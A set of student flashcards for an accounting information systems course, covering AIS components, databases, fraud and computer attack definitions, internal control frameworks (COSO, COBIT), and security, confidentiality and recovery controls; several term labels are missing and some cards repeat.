Term
Ch. 1
Characteristics of a useful system |
|
Definition
| Relevant, Reliable, Complete, Timely, Understandable, Verifiable, Accessible |
|
|
Term
Ch. 1
5 major business processes or transaction cycles |
|
Definition
- revenue
- expenditure
- production or conversion
- human resources/payroll
- financing
|
|
|
Term
Ch. 1
6 components of AIS |
|
Definition
- people
- procedures and instructions
- data
- software
- information technology infrastructure
- internal controls and security measures
|
|
|
Term
Ch. 1
3 business functions of AIS |
|
Definition
- collect and store data about org’s activities, resources, and personnel
- transform data into information so mgmt can plan, execute, control, and evaluate activities, resources, and personnel.
- provide adequate controls to safeguard the organization’s assets and data
|
|
|
Term
Ch. 1
How AIS adds value to an organization |
|
Definition
- improving the quality and reducing the costs of products or services
- improving efficiency
- sharing knowledge
- improving the efficiency and effectiveness of its supply chain
- improving the internal control structure
- improving decision making
|
|
|
Term
Ch. 1
Value chain of 5 primary activities that directly provide value to customers |
|
Definition
- inbound logistics (receive, store, distribute materials)
- operations (activities transforming inputs into final products or services)
- outbound logistics (activities to distribute finished products or services to customers)
- Marketing and sales (help customers buy the org’s products/services)
- Service (provide post-sale support to customers)
|
|
|
Term
Ch. 2
Data is collected about what three facets of each business activity? |
|
Definition
- each activity of interest
- the resources affected by each activity
- the people who participate in each activity
|
|
|
Term
|
Definition
used to collect data about a business activity |
|
|
Term
|
Definition
company output sent to an external party, who often adds data to the document, and then are returned to the company as an input document. Help collect data and ensure it’s accurate and complete. |
|
|
Term
Ch.2
source data automation device |
|
Definition
captures transaction data in machine-readable form at the time and place of their origin (ATMs, barcode scanners, etc). This is a way to collect data and ensure the data are accurate and complete. |
|
|
Term
|
Definition
| items numbered consecutively to account for all items; any missing items cause a gap in the numerical squence. (prenumbered checks, invoices, POs etc.) |
|
|
Term
|
Definition
| blocks of numbers are reserved for specific categories of data; users can identify an item's type and model using the code of numbers (ex. general ledger account numbers-blocked by acct type, employee numbers-blocked by dept, customer numbers-blocked by region) |
|
|
Term
|
Definition
| 2 or more subgroups of digits used to code items, are often used in conjunction with block codes |
|
|
Term
|
Definition
| letters and numbers are interspersed to identify an item; derived from the description of the item; easy to memorize |
|
|
Term
|
Definition
| list of the numbers assigned to each general ledger account |
|
|
Term
|
Definition
| something about which information is stored, such as employees, inventory items, and customers |
|
|
Term
|
Definition
| contains data about entity attributes; many fields=a record |
|
|
Term
|
Definition
| a set of interrelated, centrally coordinated files |
|
|
Term
Ch.2
4 types of data processing activities |
|
Definition
CRUD
- Creating - new data records
- Reading - retrieving, or viewing existing data
- Updating - previously stored data
- Deleting
|
|
|
Term
|
Definition
| updating done periodically; ex. daily, instead of by transaction |
|
|
Term
Ch.2
online, real-time processing
|
|
Definition
| ensures stored info is always current, thereby increasing its decision-making usefulness; also more accurate; provides competative advantage; |
|
|
Term
Ch.2
Enterprise resource planning (ERP) systems |
|
Definition
| integrate all aspects of a company's operations with a traditional AIS; ERP system collects, processes, and stores data and provides the information managers and external parties need to assess the company; ERPs are modular, with each module using best business practices to automate a standard business process; advantages and disadvantages on pg. 37 |
|
|
Term
|
Definition
graphically describes the blow of data within an organization;
uses data sources/destinations; data flows; transformation processes (circle); data stores (double lines)
|
|
|
Term
Ch.3
Data sources/destinations |
|
Definition
| data sources/destinations (square - entities that send or receive data that the system uses or produces) |
|
|
Term
|
Definition
| data flows (arrows - data that pass between data stores and a source or destination must go through a data transformation process; labeled to show flow) |
|
|
Term
|
Definition
| highest level DFD; proves summary-level view of a system; depicts a data processing system and the entities that are the sources and destinations of system inputs and outputs. |
|
|
Term
|
Definition
| illustrates the flow of documents and information among areas of responsibility within an organization; trace documents from cradle to grave showing where each document originates, its distribution, its purpose, its disposition, and everything that happens as it flows through the system |
|
|
Term
Ch.3
internal control flowcharts |
|
Definition
| document flowchart that describes and evaluates internal controls |
|
|
Term
|
Definition
| depicts relationships among system input, processing, and output; an important systems analysis, design, and evaluation tool. |
|
|
Term
|
Definition
| illustrates the sequence of logical operations performed by a computer in executing |
|
|
Term
Ch.4
Database management system (DBMS) |
|
Definition
| the interface between the database and the various application programs. |
|
|
Term
|
Definition
| the database, the DBMS, and the application programs that access the database through the DBMS. |
|
|
Term
Ch.4
Database administrator (DBA) |
|
Definition
responsible for the database |
|
|
Term
Ch.4
business intelligence |
|
Definition
using a data warehouse for strategic decision making. (data warehouse=both detailed and summarized data for a number of years and is used for analysis rather than transaction processing; updated periodically.) |
|
|
Term
Ch.4
online analytical processing (OLAP) |
|
Definition
using queries to guide the investigation of hypothesized relationships in data; “drilling down” to lower levels |
|
|
Term
|
Definition
using sophisticated statistical analysis, including AI techniques such as neural networks, to “discover” unhypothesized relationships in the data. |
|
|
Term
Ch. 4
benefits of databases |
|
Definition
- data integration
- data sharing
- minimal data redundancy and data inconsistencies
- data independence
- cross-functional analysis
|
|
|
Term
Ch. 4
logical view of a database |
|
Definition
how people conceptually organize and understand the data |
|
|
Term
Ch. 4
physical view of a database |
|
Definition
how and where data are physically arranged and stored in the computer system |
|
|
Term
|
Definition
logical structure of a database
3 levels: conceptual, external, and internal |
|
|
Term
Ch. 4
Conceptual-level schema |
|
Definition
organization wide view of the entire database, lists all data elements and the relationships among them |
|
|
Term
Ch. 4
external-level schema |
|
Definition
individual user views of portions of the database, each of which is referred to as a subschema |
|
|
Term
Ch. 4
internal-level schema |
|
Definition
low-level view of the database, describes how the data are stored and accessed, including record layouts, definitions, addresses, and indexes. |
|
|
Term
|
Definition
contains information about the structure of the database. |
|
|
Term
Ch. 4
Data definition language |
|
Definition
a DBMS language that builds the data dictionary, creates the database, describes logical views for each user, and specifies records or field security constraints. |
|
|
Term
Ch. 4
data manipulation language |
|
Definition
changes database content, including data element updates, insertions, and deletions. |
|
|
Term
Ch. 4
data query language |
|
Definition
contains powerful, easy-to-use commands that enable users to retrieve, sort, order, and display data. |
|
|
Term
|
Definition
abstract representation of database contents, upon which the DBMS is built. |
|
|
Term
|
Definition
|
|
Term
Ch. 4
primary key (for a database) |
|
Definition
| the database attribute, or combination of attributes, that uniquely identifies a specific row in a table |
|
|
Term
|
Definition
| an attribute that is a primary key in another table, it’s used to link tables. |
|
|
Term
|
Definition
gaining an unfair advantage over another person. legally, for an act to be fraudulent there must be:
- a false statement, representation, or disclosure
- a material fact
- an intent to deceive
- a justifiable reliance (person relies on misrepresentation to take an action
- an injury or loss suffered by the victim
|
|
|
Term
Ch. 5
4 actions from the Treadway Commission to reduce fraudulent financial reporting
|
|
Definition
- establish an org environment that contributes to the integrity of the financial reporting process
- identify and understand the factors that lead to fraudulent financial reporting
- assess the risk of fraudulent financial reporting within the company
- design and implement internal controls to provide reasonable assurance of preventing fraudulent financial reporting
|
|
|
Term
|
Definition
- pressure=person’s incentive/motivation for committing fraud; three types are financial, lifestyle, and emotional
- opportunity=condition or situation that allows a person or organization to do three things: commit the fraud, conceal the fraud, and convert the theft to personal gain
- rationalization=allows people to justify their behavior
|
|
|
Term
Ch. 5
types of computer fraud |
|
Definition
- input
- processor=unauthorized system use
- computer instructions=tampering with company software, copying software illegally, using it in an unauthorized manner, and developing software to carry out an unauthorized activity.
- data=illegally using, copying, browsing, searching, or harming company data.
- output
|
|
|
Term
Ch. 5
ways to prevent, detect, reduce |
|
Definition
|
|
Term
|
Definition
the unauthorized access, modification, or use of an electronic device or some elements of a computer system |
|
|
Term
|
Definition
robot network, a network of powerful and dangerous hijacked computers |
|
|
Term
|
Definition
gaining control of a computer to carry out illicit activities without the user’s knowledge |
|
|
Term
|
Definition
install software that responds to the hacker’s electronic instructions onto unwitting PCs |
|
|
Term
Ch. 6
denial-of-service attack |
|
Definition
botnets are used for this; designed to make a resource unavailable to its users |
|
|
Term
|
Definition
(direct harvesting attacks); staged by spammers; use special software to guess addresses at a company and send blank e-mail messages; those not returned are probably real, so they’re added to a spam list |
|
|
Term
|
Definition
making an electronic communication look as if someone else sent it to gain the trust of the recipient |
|
|
Term
|
Definition
making an email appear as though it originated from a different source |
|
|
Term
|
Definition
displaying an incorrect number on a caller ID display to hide the caller’s identity |
|
|
Term
Ch. 6
IP address spoofing |
|
Definition
creating IP packets with forged source IP addresses to conceal the identity of the sender or to impersonate another computer system (used for DoS attacks) |
|
|
Term
Ch. 6
address resolution protocol (ARP) spoofing |
|
Definition
sending fake ARP messages to an Ethernet LAN. |
|
|
Term
|
Definition
using the short message service SMS to change the name or number a text message appears to come from |
|
|
Term
|
Definition
|
|
Term
|
Definition
sniffing the ID of a domain name system request and replying before the real DNS server can. |
|
|
Term
|
Definition
an attack between the time a new software vulnerability is discovered and the time a software developer releases a patch that fixes problem |
|
|
Term
Ch. 6
Cross-site scripting (XSS) |
|
Definition
a vulnerability in dynamic web pages that allows an attacker to bypass a browser’s security mechanisms and instruct the victim’s browser to execute code thinking it came from the desired web site. |
|
|
Term
Ch. 6
buffer overflow attack |
|
Definition
happens when the amount of data entered into a program is greater than the amount of memory set aside to receive it. |
|
|
Term
Ch. 6
SQL injection attack |
|
Definition
malicious code in the form of an SQL query that is inserted into input so it can be passed to and executed by an application program. |
|
|
Term
Ch. 6
Man-in-the-middle attack |
|
Definition
places a hacker between a client and a host and intercepts network traffic between them. Session hijacking attack; used to attack public-key encryption systems where sensitive and valuable info is passed back and forth. |
|
|
Term
Ch. 6
Masquerading/impersonation |
|
Definition
| pretending to be an authorized user to access a system |
|
|
Term
|
Definition
- clandestine use of a neighbor’s wi-fi network
- tapping into a telecommunications line and electronically latching onto a legitimate user before the user enters a secure system an unauthorized person following
- an authorized person through a secure door, bypassing physical security controls such as keypads, ID cards etc.
|
|
|
Term
|
Definition
| penetrating a system’s defenses, stealing the file containing valid passwords, decrypting them, and using them to gain access to programs, files, and data |
|
|
Term
|
Definition
| programming a computer to dial thousands of phone lines searching for dial-up modem lines. hackers hack the PC attached to the modem and access the network to which it is connected. |
|
|
Term
|
Definition
| using rockets to let loose wireless access points attached to parachutes that detected unsecured wireless networks in an area. |
|
|
Term
|
Definition
| changing data before, during, or after it is entered into the system in order to delete, alter, add, or incorrectly update key system data. |
|
|
Term
|
Definition
| the unauthorized copying of company data |
|
|
Term
|
Definition
| using a small device with storage capacity to download unauthorized data |
|
|
Term
|
Definition
| used to embezzle money a “salami slice” at a time from many different accounts. |
|
|
Term
|
Definition
| all interest calculations are truncated at 2 decimal places and the excess decimals are put into another account set up by the perpetrator. |
|
|
Term
|
Definition
| theft of information, trade secrets, and intellectual property |
|
|
Term
|
Definition
| threatening to harm a company or person if a specified amount of money isn’t paid |
|
|
Term
|
Definition
| seriously? why is this in our textbook? |
|
|
Term
|
Definition
| the act of disrupting electronic commerce and harming computers and communications |
|
|
Term
Ch. 6
internet misinformation |
|
Definition
| using the internet to spread false or misleading info |
|
|
Term
Ch. 6
internet pump-and-dump |
|
Definition
| fraud using the internet to pump up the price of a stock and then selling it. |
|
|
Term
|
Definition
| manipulating click numbers to inflate advertising bills |
|
|
Term
|
Definition
| offering free web site for a month, developing a worthless web site, and charing the phone bill of the people who accept the offer for months, whether they want to continue using the site or not. |
|
|
Term
|
Definition
| the unauthorized coping or distribution of copyrighted software |
|
|
Term
|
Definition
| techniques or psychological tricks used to get people to comply with the perpetrator’s wished in order to gain physical or logical access to a building, computer, server, or network. |
|
|
Term
|
Definition
| using an invented scenario to increase the likelihood that a victim will divulge info or do something. |
|
|
Term
|
Definition
| creating a seemingly legit business, collecting personal info while making a sale, and never delivering the product |
|
|
Term
|
Definition
| sending an electronic message pretending to be a legit company, usually a financial institution, and requesting info or verification of into and often warning of some dire consequence if it is not provided. |
|
|
Term
|
Definition
| like phishing except that the victim enters confidential data by phone. |
|
|
Term
|
Definition
| activities performed on stolen credit cards, including making a small online purchase to determine if the card is still valid, and buying/selling stolen credit card numbers |
|
|
Term
|
Definition
| redirecting web site traffic to a spoofed web site/ |
|
|
Term
|
Definition
| a wireless network with the same name as a legit wireless access point. |
|
|
Term
|
Definition
| setting up similarly named web sites so users making typographical errors are sent to an invalid site. |
|
|
Term
|
Definition
| secretly changing an already open browser tab |
|
|
Term
Ch. 6
scavenging/dumpster diving |
|
Definition
| gaining access to confidential info by searching documents and records. |
|
|
Term
|
Definition
| perpetrators look over a person’s shoulder in a public place to get info like ATM PINs etc. |
|
|
Term
|
Definition
| perp inserts a sleeve into an ATM that prevents the ATM from ejecting the card. When it is obvious the card is trapped, the perp approaches the victim and pretends to help, tricking the person into entering their PIN again. when the person gives up the thief removes the card and gets money. |
|
|
Term
|
Definition
| double-swiping a credit card in a legit terminal or swiping it in a hidden one that records the credit card data for later use. |
|
|
Term
|
Definition
| posing as a service engineer and planting a small chip that records transaction data in a legit credit card reader. |
|
|
Term
|
Definition
| any software that can be used to do harm. |
|
|
Term
|
Definition
| software secretly monitors and collects personal info about users and sends it to someone else. |
|
|
Term
|
Definition
| spyware that pops banner ads on a monitor, collects info about the user’s web surfing and spending habits, and forwards it to the adware creator. |
|
|
Term
|
Definition
| destroys competing malware, resulting in malware warfare between competing developers. |
|
|
Term
|
Definition
| software that’s often malicious and of little or no benefit that is sold using scare tactics. |
|
|
Term
|
Definition
| fake antivirus software that when activated, locks you out of al your programs and data by encrypting them. monetary payment must be made to get it back. not very common because it’s easy to trace. |
|
|
Term
Ch. 6
key logging software |
|
Definition
| records computer activity, such as a user’s keystrokes, emails sent and received, web sites visited, etc. |
|
|
Term
|
Definition
| set of malicious computer instructions in an authorized and otherwise properly functioning program. unlike worms, it doesn’t try to replicate. |
|
|
Term
Ch. 6
time bomb/logic bomb |
|
Definition
| trojan horses that lie idle until triggered by a specified date or time, by a change in the system, by a message sent to the system, or by an event that doesn’t occur. once triggered it destroys programs and data. |
|
|
Term
Ch. 6
trap door/back door |
|
Definition
| way into the system that bypasses normal authorization controls. |
|
|
Term
Ch. 6
trap door/back door |
|
Definition
| capture data from info packets as they travel over networks; captured data are examined to find confidential or proprietary info. |
|
|
Term
Ch. 6
steganography programs |
|
Definition
| hide data files inside a host file, such as a large image or sound file. the software merges the two files by removing scattered bytes from the host file and replacing them with data from the hidden file. |
|
|
Term
|
Definition
| conceals processes, files, network connections, memory addresses, systems utility programs, and system data from the operating system and other programs. often modify the operating system or install themselves as drivers. they’re used to hide the presence of trap doors, sniffers, and key loggers etc. |
|
|
Term
|
Definition
| the unauthorized use of special system programs to bypass regular system controls and perform illegal acts, all without leaving an audit trail. |
|
|
Term
|
Definition
| segment of self-replicating, executable code that attaches itself to a file or program; spreads to other systems when the file is downloaded by another. some mutate |
|
|
Term
|
Definition
| self-replicating computer program like a virus except: 1. a worm is a stand-alone program, not a segment of code attached to something. 2. worms actively seeks to send copies of itself to other network devices, virus require a human to do something to spread. 3. worms harm networks, whereas viruses infect/corrupt files/data on a targeted computer. |
|
|
Term
|
Definition
| stealing contact lists, images and other data using bluetooth |
|
|
Term
|
Definition
| taking control of someone else’s phone to make or listen to calls, send or read texts, connect to the internet, forward the victim’s calls, etc. |
|
|
Term
|
Definition
| the process implemented to provide reasonable assurance that control objectives are achieved |
|
|
Term
Ch. 7
Three functions of internal controls |
|
Definition
- preventive controls
- detective controls
- corrective controls
|
|
|
Term
Ch. 7
preventive controls |
|
Definition
deter problems before they arise (hire qualified personnel, segregate duties, control physical assets/info) |
|
|
Term
|
Definition
discover problems that aren’t prevented (duplicate checking of calculations) |
|
|
Term
Ch. 7
corrective controls |
|
Definition
identify and correct problems as well as correct and recover from the resulting errors (maintain backups, correct data entry errors) |
|
|
Term
Ch. 7
Two categories of internal controls |
|
Definition
- General Controls (make sure an org’s control environment is stable and well maintained)
- Application Controls (make sure transactions are processed correctly; concerned with accuracy, completeness, validity, and authorization of the data captured, entered, processed, stored, transmitted to other systems, and reported.)
|
|
|
Term
Ch. 7
foreign corrupt practices act |
|
Definition
passed to prevent companies from bribing foreign officials to obtain business. |
|
|
Term
Ch. 7
COBIT framework addresses control from 4 vantage points |
|
Definition
- Business objectives (info must conform to seven categories of criteria that map into the objectives established by COSO)
- IT resources=people, application systems, tech, facilities, and data
- IT processes=four domains: planning/organization, acquisition/implementation, delivery/support, monitoring/evaluation
|
|
|
Term
|
Definition
consists of the AAA, AICPA, IIA, IMA, and FEI. |
|
|
Term
Ch. 7
Internal Control-Integrated Framework |
|
Definition
issued by COSO; widely accepted as the authority on internal controls. |
|
|
Term
Ch. 7
5 components of COSO’s IC framework |
|
Definition
- control environment
- control activities
- risk assessment
- info and communication
- monitoring
|
|
|
Term
Ch. 7
Enterprise Risk Management-Integrated Framework
|
|
Definition
developed by COSO as a second control framework; ERM is the process the BoD and mgmt use to set strategy, identify events that may affect the entity, assess and manage risk, and provide reasonable assurance that the company achieves its objectives and goals. |
|
|
Term
Ch. 7
ERM model components |
|
Definition
- internal environments
- objectives setting
- event identification
- risk assessment
- risk response
- control activities
- info & communication
- monitoring
|
|
|
Term
Ch. 7
what does and internal environment consist of? |
|
Definition
- mgmts’s philosophy, operating style, and risk appetite
- the board of directors (audit committee)
- commitment to integrity, ethical values, and competence
- organizational structure
- methods of assigning authority and responsibility
- human resource standards (hiring, compensating/evaluating/promoting, training, managing disgruntled employees, discharging, vacations/rotations, confidentiality agreements, prosecute/incarcerate perps)
- external influences (FASB, PCAOB, SEC etc)
|
|
|
Term
Ch. 7
ERM objective types |
|
Definition
- strategic
- operations
- reporting
- compliance
|
|
|
Term
|
Definition
exists before mgmt takes any steps to control the likelihood or impact of an event |
|
|
Term
|
Definition
what remains after mgmt implements internal controls or some other response risk |
|
|
Term
|
Definition
- reduce (by implementing an effective system of internal controls)
- accept (the likelihood and impact of the risk
- share (or transfer it to someone else by buying insurance, outsourcing, or hedging)
- avoid (don’t engage in the activity that produces the risk)
|
|
|
Term
|
Definition
used to estimate the value of internal controls; Expected Loss=Impact x likelihood |
|
|
Term
Ch. 7
7 Control procedure categories |
|
Definition
- proper authorization of transactions and activities
- segregation of duties
- project development and acquisition controls
- change mgmt controls
- design and use of documents and records
- safeguarding assets, records, and data
- independent checks on performance
|
|
|
Term
Ch. 7
specific authorization |
|
Definition
certain activities/transactions that are of such consequence that mgmt has to authorize them |
|
|
Term
Ch. 7
general authorization |
|
Definition
authorizes employees to handle routine transactions without special approval |
|
|
Term
Ch. 7
segregation of accounting duties |
|
Definition
- authorization
- recording
- custody
|
|
|
Term
Ch. 7
segregation of system duties |
|
Definition
- system admin
- network mgmt
- security mgmt
- change mgmt
- users
- systems analysis
- programming
- computer operations
- info system library
- data control
|
|
|
Term
|
Definition
manages a systems development effort involving its own personnel, its client, and other vendors. |
|
|
Term
Ch. 7
Computer security officer |
|
Definition
in charge of system security, independent of the into system function |
|
|
Term
Ch. 8
7 IT controls criteria in the COBIT framework
|
|
Definition
- effectiveness (relevant, timely info)
- efficiency (info must be produced in a cost-effective manner)
- confidentiality (sensitive information must be protected)
- integrity (info must be accurate, complete, and valid)
- availability (info must be available whenever needed)
- compliance (ensure compliance with internal and external policies/requirements)
- reliability (mgmt must have access to appropriate info needed to conduct daily activities etc.)
|
|
|
Term
Ch. 8
4 Management domains (basic mgmt activities for COBIT) |
|
Definition
- Plan and Organize (define IT plan, determine tech direction, manage IT investment, communicate mgmt aims/direction etc.)
- Acquire and Implement (acquire and maintain application software/tech infrastructure, procure it resources, manage changes, etc.)
- Deliver and Support (define/manage service levels, ensure system security, manage problems/data/physical environment/operations etc.
- Monitor and Evaluate (IT performance & internal control, ensure compliance with external requirements, provide IT governance)
|
|
|
Term
Ch. 8
2 fundamental info security concepts |
|
Definition
- security is a management issue, not a technology issue
- defense-in-depth and time-based model of info security
|
|
|
Term
|
Definition
use multiple layers of controls; involve preventive, detective, and corrective controls |
|
|
Term
Ch. 8
time-based model of security |
|
Definition
P=time it takes an attack to break through preventive controls
D=time it takes to detect an attack is in progress
C=time it takes to respond to the attack
if P>D+C then security procedures are effective. |
|
|
Term
Ch. 8
Preventive controls |
|
Definition
- training
- user access controls
- physical access controls
- network access controls
- device/software hardening controls
|
|
|
Term
Ch. 8
user access controls |
|
Definition
authentication (something they know, something they have, some physical characteristic), authorization (for access to certain portions of a system) |
|
|
Term
Ch. 8
access control matrix |
|
Definition
| a way to implement authorization controls; when an employee attempts to access a particular info system resource, the system performs a compatibility test that matches the user’s authentication credentials agains the access control matrix. |
|
|
Term
Ch. 8
network access controls |
|
Definition
| perimeter defense: routers, firewalls, intrusion prevention systems |
|
|
Term
|
Definition
| connects an org’s info system to the internet |
|
|
Term
|
Definition
| a special-purpose hardware device or software running on a general-purpose computer |
|
|
Term
|
Definition
| separate network that permits controlled access from the Internet to selected resources. |
|
|
Term
Ch. 8
Transmission Control Protocol |
|
Definition
| specifies the procedures for dividing files and documents into packets to be sent over the internet and the methods for reassembly of the original document or file at the destination |
|
|
Term
|
Definition
| specifies the structure of packets and how to route them to the proper destination. |
|
|
Term
|
Definition
| designed to read the destination address fields in IP packet headers to decide where to send the packet next. |
|
|
Term
Ch. 8
access control list |
|
Definition
| set of rules that determines which packets are allowed entry and which are dropped |
|
|
Term
Ch. 8
static packet filtering |
|
Definition
| performed by border filters; screens individual IP packets based solely on the contents of the source and/or destination fields in the IP packet header; examines each individual packet |
|
|
Term
Ch. 8
stateful packet filtering |
|
Definition
| creates and maintains a table in memory that lists all established connections between the org’s computers and the internet |
|
|
Term
Ch. 8
deep packet inspection |
|
Definition
| the process of examining the data contents of a packet; slows stuff down because it’s examining the body of an IP packet, not just the addresses |
|
|
Term
Ch. 8
intrusion prevention systems |
|
Definition
| monitors patterns in the traffic flow, rather than only inspecting individual packets, to identify and automatically block attacks. |
|
|
Term
|
Definition
| verifies the identity of users attempting to obtain dial-in access (for securing dial-up connections) |
|
|
Term
|
Definition
| software that calls every telephone number assigned to an org and identifies those which are connected to modems. |
|
|
Term
|
Definition
| the process of modifying the default configuration of endpoints to eliminate unnecessary settings and services |
|
|
Term
|
Definition
- log analysis
- intrusion detection systems
- managerial reports
- security testing
|
|
|
Term
Ch. 8
intrusion detection system |
|
Definition
| set of sensors and a central monitoring unit that create logs of network traffic that was permitted to pass the firewall and then analyze those logs for signs of attempted or successful intrusion. |
|
|
Term
Ch. 8
penetration testing |
|
Definition
| an authorized attempt by either an internal audit team or an external security consulting firm to break into the org’s info system |
|
|
Term
Ch. 8
Corrective Controls |
|
Definition
- computer incident response team
- chief info security officer
- patch management
|
|
|
Term
Ch. 8
Computer incident response team |
|
Definition
responsible for dealing with major incidents should go through 4 steps:
- recognition
- containment
- recovery
- follow-up
|
|
|
Term
Ch. 8
patch management (fine!) |
|
Definition
| the process for regularly applying patches and updates to all software used by the org. |
|
|
Term
|
Definition
| run multiple systems simultaneously on one physical computer |
|
|
Term
Ch. 9
Ways to preserve confidentiality |
|
Definition
- identification and classification of the info to be protected
- encryption of sensitive information
- controlling access to sensitive info
- training
|
|
|
Term
Ch. 9
Information rights management |
|
Definition
| software that provides an additional layer of protection to specific info resources, offering the capability not only to limit access to specific files or focus, but also to specify the actions that individuals who are granted access to that resource can perform. |
|
|
Term
Ch. 9
data loss prevention software |
|
Definition
| works like antivirus programs in reverse, blocking outgoing messages that contain key words or phrases associated with the intellectual property or other sensitive data. |
|
|
Term
|
Definition
| embedded code. a detective control that enables an org to identify confidential info that has been disclosed. the company can scan for stuff with it’s watermark on the internet. |
|
|
Term
|
Definition
| part of the Trust services framework like confidentiality principle, but it focuses on protecting personal info about customers rather than organizational data. |
|
|
Term
Ch. 9
GAPP’s 10 internationally recognized best practices for protecting customer info privacy |
|
Definition
- management
- notice
- choice/consent
- collection (cookies)
- use/retention (only as long as it’s needed for a legit business purpose)
- access
- disclosure to third parties
- security
- quality
- monitoring/enforcement
|
|
|
Term
|
Definition
| the process of transforming normal content, called plaintext into unreadable gibberish called ciphertext |
|
|
Term
Ch. 9
factors that influence encryption strength |
|
Definition
| key length encryption algorithm policies for managing cryptographic keys |
|
|
Term
Ch. 9
Types of encryption systems |
|
Definition
| Symmetric (use same code at both ends) Asymmetric (uses public and private keys) |
|
|
Term
|
Definition
| the process that takes plaintext of any length and transforms it into a short code called a hash. |
|
|
Term
|
Definition
| nonrepudiation, how to create a legally binding agreement that can’t be unilaterally repudiated by either party. |
|
|
Term
|
Definition
| a hash of a document that’s encrypted using the document creator’s private key. provide proof that 1. a copy of a document or file hasn’t been modified; 2. and who created the original version. |
|
|
Term
Ch. 9
digital certificate |
|
Definition
| an electronic document that contains an entity’s public key and certifies the identity of the owner of the particular public key. |
|
|
Term
Ch. 9
certificate authority |
|
Definition
| org that distributes digital certificates; contains their digital signature to ensure it’s genuine. |
|
|
Term
Ch. 9
public key infrastructure (PKI) |
|
Definition
| the system for issuing pairs of public and private keys and corresponding digital certificates |
|
|
Term
Ch. 9
Virtual Private Networks (VPNs) |
|
Definition
| encrypting info while it traverses the internet; provides the functionality of a privately owned secure network without the associated costs of leasing telephone lines, satellites, and other equipment; creates private communication channels, tunnels, which are accessible only to those parties possessing the appropriate encryption and decryption keys; also contain controls to authenticate the parties exchanging information and to create an audit trail so it satisfies COBIT controls. |
|
|
Term
|
Definition
- forms design (pre-numbered, turnaround docs)
- cancellation and storage of source documents
- data entry controls
- additional batch processing data entry controls
- additional online data entry controls
|
|
|
Term
|
Definition
| compares the ID code or account number in transaction data with similar data in the master file to verify that the account exists |
|
|
Term
Ch. 10
reasonableness test |
|
Definition
| determines the correctness of the logical relationship between two data items. |
|
|
Term
|
Definition
| computed from other digits, makes sure the number you entered is the one you meant to. |
|
|
Term
Ch. 10
three types of batch totals |
|
Definition
- financial
- hash
- record count
|
|
|
Term
Ch. 10
online data entry controls |
|
Definition
- prompting
- closed-loop verification (displays related info about you input)
- transaction log
|
|
|
Term
Ch. 10
Processing Controls |
|
Definition
- data matching
- file labels (header/trailer records
- recalculation of batch totals
- cross-footing and zero-balance tests
- write-protection mechanisms
- concurrent update controls
|
|
|
Term
|
Definition
- user review output
- reconciliation procedures
- external data reconciliation
- data transmission controls (checksums & parity bits)
|
|
|
Term
Ch. 10
batch processing integrity controls |
|
Definition
- prepare batch totals
- deliver the transactions to the computer operations department for processing
- enter the transaction data into the system
- sort and edit the transaction file
- update the master files
- prepare and distribute output
- user review
|
|
|
Term
Ch. 10
ways to minimize risk of system downtime |
|
Definition
- preventive maintenance
- fault tolerance
- data center location and design
- training
- patch management and antivirus software
|
|
|
Term
Ch. 10
ways to have quick and complete recovery and resumption of normal operations |
|
Definition
- backup procedures
- disaster recover plan
- business continuity plan
|
|
|
Term
|
Definition
| use of redundant components so the system can function even if a component fails |
|
|
Term
Ch. 10
redundant arrays of independent drives (RAID) |
|
Definition
| several disk drives a written at once to help with fault tolerance |
|
|
Term
Ch. 10
uninterruptible power supply |
|
Definition
| provides protection in the event of a prolonged power outage, using battery power to enable the system to operate long enough to back up critical data and safely shut down. |
|
|
Term
Ch. 10
recovery point objective |
|
Definition
| answers the question of how much data a company is willing to recreate from source docs, or how much they’re willing to lose; SPO=the max amount of data the org is willing to potentially lose. |
|
|
Term
Ch. 10
Recovery time objective |
|
Definition
| represents the length of time the org is willing to attempt to function without its info system |
|
|
Term
Ch. 10
incremental backup |
|
Definition
| copy only the data items that have changed since the last partial backup |
|
|
Term
Ch. 10
differential backup |
|
Definition
| copies all changes made since the last full backup |
|
|
Term
|
Definition
| copy of a database, master file, or software that’s retained indefinitely as an historical record, usually to satisfy legal and regulatory requirements; not usually encrypted. |
|
|
Term
Ch. 10
Disaster recovery plan |
|
Definition
| outlines the procedures to restore an org’s IT function in the event that its data center is destroyed. |
|
|
Term
|
Definition
| facility that is prewired for phone and internet access but also has all the computing and office equipment the org needs to perform its essential business activities |
|
|
Term
Ch. 10
business continuity plan |
|
Definition
| specifies how to resume not only IT operations, but all business processes, including relocating to new offices and hiring temporary replacements |
|
|
Term
|
Definition
| the formal process used to ensure that modifications to hardware, software, or processes do not reduce systems reliability; careful testing ensures less downtime; good documentation provides better trouble-shooting |
|
|
Term
|
Definition
- all change requests should be standard and documented
- all changes should be approved by appropriate levels of mgmt
- changes should be thoroughly tested prior to implementation
- all documentation should be updated to reflect authorized changes
- emergency changes must be documented and subjected to a formal review/approval
- backout plans need to be developed for reverting to previous config in case approved changes need to be interrupted or abandoned
- user rights and privileges must be carefully monitored during the change process to ensure that proper segregation of duties is maintained.
|
|
|
Term
|
Definition
prepare batch totals
deliver the transactions to the computer operations department for processing
enter the transaction data into the system
sort and edit the transaction file
update the master files
prepare and distribute output
user review |
|
|
Term
|
Definition
preventive maintenance
fault tolerance
data center location and design
training
patch management and antivirus software |
|
|
Term
|
Definition
backup procedures
disaster recover plan
business continuity plan |
|
|
Term
|
Definition
| use of redundant components so the system can function even if a component fails |
|
|
Term
|
Definition
| several disk drives a written at once to help with fault tolerance |
|
|
Term
|
Definition
| provides protection in the event of a prolonged power outage, using battery power to enable the system to operate long enough to back up critical data and safely shut down. |
|
|
Term
|
Definition
| answers the question of how much data a company is willing to recreate from source docs, or how much they’re willing to lose; SPO=the max amount of data the org is willing to potentially lose. |
|
|
Term
|
Definition
| represents the length of time the org is willing to attempt to function without its info system |
|
|
Term
|
Definition
| copy only the data items that have changed since the last partial backup |
|
|
Term
|
Definition
| copies all changes made since the last full backup |
|
|
Term
|
Definition
| copy of a database, master file, or software that’s retained indefinitely as an historical record, usually to satisfy legal and regulatory requirements; not usually encrypted. |
|
|
Term
|
Definition
| outlines the procedures to restore an org’s IT function in the event that its data center is destroyed. |
|
|
Term
|
Definition
| facility that is prewired for phone and internet access but also has all the computing and office equipment the org needs to perform its essential business activities |
|
|
Term
|
Definition
| specifies how to resume not only IT operations, but all business processes, including relocating to new offices and hiring temporary replacements |
|
|
Term
|
Definition
| the formal process used to ensure that modifications to hardware, software, or processes do not reduce systems reliability; careful testing ensures less downtime; good documentation provides better trouble-shooting |
|
|
Term
|
Definition
all change requests should be standard and documented
all changes should be approved by appropriate levels of mgmt
